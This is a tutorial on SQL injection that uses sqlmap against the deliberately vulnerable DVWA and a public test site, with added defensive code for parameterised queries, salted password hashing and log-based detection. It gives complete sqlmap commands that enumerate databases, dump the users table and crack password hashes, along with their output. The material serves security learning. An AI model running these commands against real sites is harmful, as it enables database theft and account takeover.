With the advancement of technology, the risk of cyber-attacks keeps growing, and websites are becoming more exposed to them for many reasons. SQL injection attacks are increasing rapidly, putting the security of web applications at risk. You can prevent significant data loss, cyber-attacks, and business disruption by scanning your web application for such flaws. In this article, you will learn more about SQL injection attacks and ways to prevent them.

What is SQL Injection

SQL injection is a kind of attack on web applications that build SQL queries from user-supplied data. Using SQL injection, attackers can execute malicious SQL statements that control the database server behind the website.

Attackers use SQL injection to retrieve information from web applications: they obtain the application's data by sending a fragment of SQL as a query parameter. There are several kinds of SQL injection attack, such as time-based, union-based, Boolean-based, and error-based SQL injection.

As a web developer, you should always take measures to protect your web application from SQL injection vulnerabilities that attackers can uncover and exploit.

One of the common tools for detecting and exploiting SQL injection vulnerabilities is sqlmap.

What is Sqlmap

Sqlmap is an open-source tool used to discover SQL injection vulnerabilities in websites. It can find injection points in vulnerable sites using different kinds of queries. You can scan for and track new security flaws before they are attacked, and perform assessments to find vulnerabilities. It is a penetration testing tool that automates the detection and exploitation of SQL injection flaws.

Sqlmap accepts both GET and POST requests when analyzing security flaws in a targeted web application. Websites are more likely to be vulnerable to SQL injection when a GET parameter is exposed directly in the URL, because that gives an attacker a direct path to the database. You can check the website's vulnerability by marking the GET parameter's value with an asterisk (*), which sqlmap treats as the injection point. For example: http://testphp.vulnweb.com/artists.php?artist=1*

If this URL throws an error, the website is vulnerable. You can scan for or exploit the site's vulnerability using sqlmap. Here, you will learn how to use sqlmap to test a website for SQL injection vulnerabilities.
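To see where the error in the check above comes from, and how the flaw is actually removed, here is an added example (not from the original article): a Python/SQLite model of DVWA's low-security lookup, which pastes the id parameter straight into the query text, next to the parameterised version. The table contents, the query shape and the helper names are assumptions of this example.

```python
import sqlite3

# Constructed sample table, using the user names from the DVWA dump in this tutorial.
USERS = [(1, "admin", "admin"), (2, "Gordon", "Brown"), (3, "Hack", "Me"),
         (4, "Pablo", "Picasso"), (5, "Bob", "Smith")]


def make_db():
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE users (user_id INTEGER, first_name TEXT, last_name TEXT)")
    db.executemany("INSERT INTO users VALUES (?, ?, ?)", USERS)
    return db


def lookup_vulnerable(db, user_id):
    # Modelled on DVWA's low level: the untrusted parameter is pasted into the SQL text,
    # so a quote in the input ends the literal and the rest becomes part of the query.
    query = "SELECT first_name, last_name FROM users WHERE user_id = '%s'" % user_id
    return db.execute(query).fetchall()


def lookup_safe(db, user_id):
    # Parameterised query: the value travels separately from the SQL text, so no input
    # can change the query's structure; a quote is just a character in the value.
    query = "SELECT first_name, last_name FROM users WHERE user_id = ?"
    return db.execute(query, (user_id,)).fetchall()


def probe_error(lookup, db, value):
    # The tutorial's quick check: does an odd value make the database raise an error?
    try:
        lookup(db, value)
        return False
    except sqlite3.Error:
        return True


if __name__ == "__main__":
    db = make_db()
    print(probe_error(lookup_vulnerable, db, "1'"))   # True: broken quoting
    print(probe_error(lookup_safe, db, "1'"))         # False: simply no match
    print(lookup_vulnerable(db, "1' OR '1'='1"))      # every row leaks
    print(lookup_safe(db, "1' OR '1'='1"))            # []
```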

What is DVWA

There are several deliberately vulnerable web applications through which you can learn SQL injection exploitation. Here we will discuss the Damn Vulnerable Web Application (DVWA).

It is a PHP/MySQL web application that is intentionally vulnerable. Security professionals and ethical hackers use it to test their skills in a legal environment. This vulnerable web application is meant for practicing common web vulnerabilities at various difficulty levels.

In this tutorial, we’ll be using DVWA as a demonstration environment to test our sqlmap commands.

Setting Everything Up

For this tutorial, you need to install the following:

  1. sqlmap
  2. DVWA: the process is straightforward; follow this guide to set up DVWA on Ubuntu (or a similar distribution), or this guide on Windows.

If you're on a Kali machine, sqlmap is already installed. If not, you can easily install it using the following command:

$ sudo apt-get install sqlmap

To verify that it's installed and to see the command's help menu, pass -h to sqlmap:

$ sqlmap -h

If you don't want to install DVWA, you can follow along using this public vulnerable website: http://testphp.vulnweb.com/artists.php?artist=1

Once everything is set up, let's get started.

Listing the Databases on the Site

Before running any sqlmap command, log in to DVWA with admin as the username and password as the password, go to DVWA Security in the bottom left, and set the security level to Low. This lets us exploit the website in its weakest form.

Back in the terminal, the following command lists the databases behind this website:

$ sqlmap -u "http://localhost/vulnerabilities/sqli/?id=1&Submit=Submit" --cookie "PHPSESSID=u8e7b7vbkkienkafe68a6pabzf; security=low" --dbs

First, we pass the -u parameter to specify our target URL. In my case it's localhost/, but you should use wherever your DVWA is installed; if it's on another machine in the same network and in the DVWA folder, you should use something like 192.168.1.3/DVWA/vulnerabilities/sqli/?id=1&Submit=Submit.

We also pass the --cookie argument: since DVWA requires you to log in before performing SQL injection, passing our session cookie logs sqlmap in automatically. You can capture your cookie once you're logged in by opening Developer Console > Network, selecting any request, scrolling down to the Request Headers section, and finding the Cookie header.

We pass --dbs to list the databases available on the website. Here is the output:

available databases [2]:
[*] dvwadb
[*] information_schema

Listing Tables in a Database

To access a particular database, pass the -D parameter to specify the database name, then add the --tables parameter to list all tables in that database:

$ sqlmap -u "http://localhost/vulnerabilities/sqli/?id=1&Submit=Submit" --cookie "PHPSESSID=u8e7b7vbkkienkafe68a6pabzf; security=low" -D dvwadb --tables

Output:

Database: dvwadb
[2 tables]
+-----------+
| guestbook |
| users     |
+-----------+

Great, we have two tables in this database. In the next section, we'll dump the users table.

Dumping a Table

To see the available columns of a specific table, we must specify the database, the table, and the --columns argument:

$ sqlmap -u "http://localhost/vulnerabilities/sqli/?id=1&Submit=Submit" --cookie "PHPSESSID=u8e7b7vbkkienkafe68a6pabzf; security=low" -D dvwadb -T users --columns

In this case, we pass the -T parameter to specify the table name. Here is the output:

Database: dvwadb
Table: users
[8 columns]
+--------------+-------------+
| Column       | Type        |
+--------------+-------------+
| password     | varchar(32) |
| user         | varchar(15) |
| avatar       | varchar(70) |
| failed_login | int(3)      |
| first_name   | varchar(15) |
| last_login   | timestamp   |
| last_name    | varchar(15) |
| user_id      | int(6)      |
+--------------+-------------+

Awesome, let's dump this table to see all of its rows:

$ sqlmap -u "http://localhost/vulnerabilities/sqli/?id=1&Submit=Submit" --cookie "PHPSESSID=u8e7b7vbkkienkafe68a6pabzf; security=low" -D dvwadb -T users --dump

We simply passed --dump instead of --columns. This will prompt you with several questions, including whether you want to store the hashes to a temporary file and whether you want to crack the passwords via a dictionary-based attack. I passed Y (yes) for both; here is the output:

do you want to use common password suffixes? (slow!) [y/N] n
[12:40:51] [INFO] starting dictionary-based cracking (md5_generic_passwd)
[12:40:51] [INFO] starting 2 processes
[12:40:53] [INFO] cracked password 'abc123' for hash 'e99a18c428cb38d5f260853678922e03'
[12:40:53] [INFO] cracked password 'charley' for hash '8d3533d75ae2c3966d7e0d4fcc69216b'
[12:40:56] [INFO] cracked password 'password' for hash '5f4dcc3b5aa765d61d8327deb882cf99'
[12:40:58] [INFO] cracked password 'letmein' for hash '0d107d09f5bbe40cade3de5c71e9e9b7'
Database: dvwadb
Table: users
[5 entries]
+---------+---------+-----------------------------+-----------+---------------------------------------------+------------+---------------------+--------------+
| user_id | user    | avatar                      | last_name | password                                    | first_name | last_login          | failed_login |
+---------+---------+-----------------------------+-----------+---------------------------------------------+------------+---------------------+--------------+
| 1       | admin   | /hackable/users/admin.jpg   | admin     | 5f4dcc3b5aa765d61d8327deb882cf99 (password) | admin      | 2020-10-13 15:00:19 | 0            |
| 2       | gordonb | /hackable/users/gordonb.jpg | Brown     | e99a18c428cb38d5f260853678922e03 (abc123)   | Gordon     | 2020-10-08 08:20:45 | 0            |
| 3       | 1337    | /hackable/users/1337.jpg    | Me        | 8d3533d75ae2c3966d7e0d4fcc69216b (charley)  | Hack       | 2020-10-08 08:20:45 | 0            |
| 4       | pablo   | /hackable/users/pablo.jpg   | Picasso   | 0d107d09f5bbe40cade3de5c71e9e9b7 (letmein)  | Pablo      | 2020-10-08 08:20:45 | 0            |
| 5       | smithy  | /hackable/users/smithy.jpg  | Smith     | 5f4dcc3b5aa765d61d8327deb882cf99 (password) | Bob        | 2020-10-08 08:20:45 | 0            |
+---------+---------+-----------------------------+-----------+---------------------------------------------+------------+---------------------+--------------+

As you can see, we have successfully obtained the credentials of the admin user, and now we have admin access to the website.
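Why did the dictionary attack above finish in two seconds? The password column is varchar(32): DVWA stores bare MD5 digests with no salt and no work factor, which is also why admin and smithy show the identical hash in the dump. This added example (not part of the tutorial) checks that against the hashes from the dump and shows the salted, slow PBKDF2 storage a real application should use instead; the function names are my own.

```python
import hashlib
import hmac
import os

# Hashes and cracked words copied from the dumped users table above.
DUMPED = {
    "admin":   ("5f4dcc3b5aa765d61d8327deb882cf99", "password"),
    "gordonb": ("e99a18c428cb38d5f260853678922e03", "abc123"),
    "1337":    ("8d3533d75ae2c3966d7e0d4fcc69216b", "charley"),
    "pablo":   ("0d107d09f5bbe40cade3de5c71e9e9b7", "letmein"),
    "smithy":  ("5f4dcc3b5aa765d61d8327deb882cf99", "password"),
}


def is_unsalted_md5(word, stored):
    """True when `stored` is just md5(word): one hash call, no salt, no work factor."""
    return hashlib.md5(word.encode()).hexdigest() == stored


def hash_password(password, iterations=210_000):
    """Return 'salt$iterations$digest' using PBKDF2-HMAC-SHA256 and a random 16-byte salt.

    The salt makes equal passwords produce different stored values, and the iteration
    count turns each dictionary guess into hundreds of thousands of hash operations.
    """
    salt = os.urandom(16)
    digest = hashlib.pbkdf2_hmac("sha256", password.encode(), salt, iterations)
    return "%s$%d$%s" % (salt.hex(), iterations, digest.hex())


def verify_password(password, stored):
    """Recompute with the stored salt and iteration count, compare in constant time."""
    salt_hex, iterations, digest_hex = stored.split("$")
    digest = hashlib.pbkdf2_hmac("sha256", password.encode(),
                                 bytes.fromhex(salt_hex), int(iterations))
    return hmac.compare_digest(digest.hex(), digest_hex)


if __name__ == "__main__":
    for user, (stored, word) in DUMPED.items():
        print(user, "unsalted MD5:", is_unsalted_md5(word, stored))
    a, b = hash_password("password"), hash_password("password")
    print(a != b, verify_password("password", a), verify_password("letmein", b))
```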

You can also pass the -C argument to choose the column name(s) you want to dump; since we didn't specify any, sqlmap queried all available columns in that table.

During password cracking, sqlmap will prompt you for a wordlist. You can either use its default or pass your own wordlist; the crunch tool can generate custom wordlists to your specification.
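From the server side, a run like the one in this tutorial leaves very recognizable traces in the web access log: sqlmap's default User-Agent begins with sqlmap/, and it sends a burst of injection-style values for the same parameter. This added example (my code, not part of the tutorial or of sqlmap) runs a small detector over constructed Apache combined-format lines for the DVWA page used here; the IPs, timestamps and payload values are made up.

```python
import re
from collections import defaultdict
from urllib.parse import parse_qsl, urlsplit

# Constructed Apache combined-format lines: two normal visits from 10.0.0.5, then a scan
# of the DVWA page from 10.0.0.9 (the last line mimics --random-agent hiding the tool name).
SAMPLE_LOG = """\
10.0.0.5 - - [13/Oct/2020:12:40:10 +0000] "GET /vulnerabilities/sqli/?id=1&Submit=Submit HTTP/1.1" 200 4312 "-" "Mozilla/5.0"
10.0.0.5 - - [13/Oct/2020:12:40:12 +0000] "GET /vulnerabilities/sqli/?id=2&Submit=Submit HTTP/1.1" 200 4310 "-" "Mozilla/5.0"
10.0.0.9 - - [13/Oct/2020:12:40:51 +0000] "GET /vulnerabilities/sqli/?id=1&Submit=Submit HTTP/1.1" 200 4312 "-" "sqlmap/1.4#stable (http://sqlmap.org)"
10.0.0.9 - - [13/Oct/2020:12:40:51 +0000] "GET /vulnerabilities/sqli/?id=1%27%20AND%201%3D1--%20&Submit=Submit HTTP/1.1" 200 4312 "-" "sqlmap/1.4#stable (http://sqlmap.org)"
10.0.0.9 - - [13/Oct/2020:12:40:52 +0000] "GET /vulnerabilities/sqli/?id=1%27%20UNION%20ALL%20SELECT%20NULL%2CNULL--%20&Submit=Submit HTTP/1.1" 200 4350 "-" "sqlmap/1.4#stable (http://sqlmap.org)"
10.0.0.9 - - [13/Oct/2020:12:40:53 +0000] "GET /vulnerabilities/sqli/?id=1%27%20AND%20SLEEP%285%29--%20&Submit=Submit HTTP/1.1" 200 4312 "-" "Mozilla/5.0"
"""

LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[[^\]]+\] "(?P<method>\S+) (?P<target>\S+) [^"]*" '
    r'\d{3} \S+ "[^"]*" "(?P<ua>[^"]*)"$'
)
# Heuristic markers of SQL smuggled into a parameter value (checked on the decoded value).
SQLI_RE = re.compile(r"'|--|\bunion\b|\bselect\b|\bsleep\s*\(|\band\s+\d+\s*=\s*\d+", re.I)


def analyze(log_text, burst_threshold=2):
    """Return (ip, reason) alerts for sqlmap-like activity found in access-log text."""
    ua_hits = {}                # ip -> first sqlmap User-Agent seen
    probes = defaultdict(set)   # (ip, path, param) -> distinct injection-style values
    for line in log_text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue            # not combined format; skip rather than guess
        if m["ua"].lower().startswith("sqlmap"):
            ua_hits.setdefault(m["ip"], m["ua"])
        url = urlsplit(m["target"])
        for name, value in parse_qsl(url.query, keep_blank_values=True):
            if SQLI_RE.search(value):
                probes[(m["ip"], url.path, name)].add(value)
    alerts = [(ip, "default sqlmap User-Agent: " + ua) for ip, ua in ua_hits.items()]
    for (ip, path, name), values in sorted(probes.items()):
        if len(values) >= burst_threshold:   # still fires when the User-Agent is spoofed
            alerts.append((ip, "%d injection-style values sent to %s?%s" % (len(values), path, name)))
    return alerts


if __name__ == "__main__":
    for ip, reason in analyze(SAMPLE_LOG):
        print(ip, reason)
```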

Conclusion

In this tutorial, we've seen the basics of how to use the sqlmap utility to detect and exploit SQL injection vulnerabilities in websites.

With sqlmap, you can determine whether a website is vulnerable, and if it is, you can retrieve information and even update or delete data. SQL injection is a critical vulnerability that you always want your website to be free of.
